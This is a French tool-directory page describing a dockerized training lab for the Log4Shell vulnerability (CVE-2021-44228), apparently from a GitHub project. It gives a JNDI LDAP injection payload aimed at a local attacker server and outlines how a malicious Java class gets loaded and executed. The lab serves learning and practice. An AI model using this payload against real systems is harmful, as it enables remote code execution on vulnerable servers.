Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228_dockernize | Kitploit
Outils/GitHubGitHub/qw3rtyou/cve-2021-44228_dockernize
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubqw3rtyou/cve-2021-44228_dockernize

CVE-2021-44228_dockernize

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Environnement de laboratoire pour la vulnérabilité CVE-2021-44228 (Log4Shell)

Introduction

Ce projet fournit un environnement dockerisé pour s'entraîner en toute sécurité et comprendre la vulnérabilité critique Log4j connue sous le nom de CVE-2021-44228 (Log4Shell).

Fonctionnalités clés

  • Environnement de test dockerisé sécurisé
  • Capacité de test de payload personnalisé
  • Inclut le serveur LDAP de l'attaquant et l'application Java vulnérable

Pour commencer

root@kitploit:~
docker compose up --build

Test de payload

  1. Vous pouvez modifier le payload dans la section de test de /vulnerable/Makefile
  2. Le payload par défaut utilise $${jndi:ldap://127.0.0.1:10000/}

Comment ça fonctionne

  1. L'application Java vulnérable démarre
  2. Le serveur LDAP de l'attaquant écoute sur le port 10000
  3. L'application vulnérable s'exécute
  4. Le payload Log4Shell est journalisé dans l'application vulnérable via la section de test du Makefile
  5. L'application vulnérable tente une recherche JNDI LDAP
  6. Le serveur LDAP renvoie une classe Java malveillante
  7. L'application vulnérable charge et exécute cette classe
Télécharger l’outil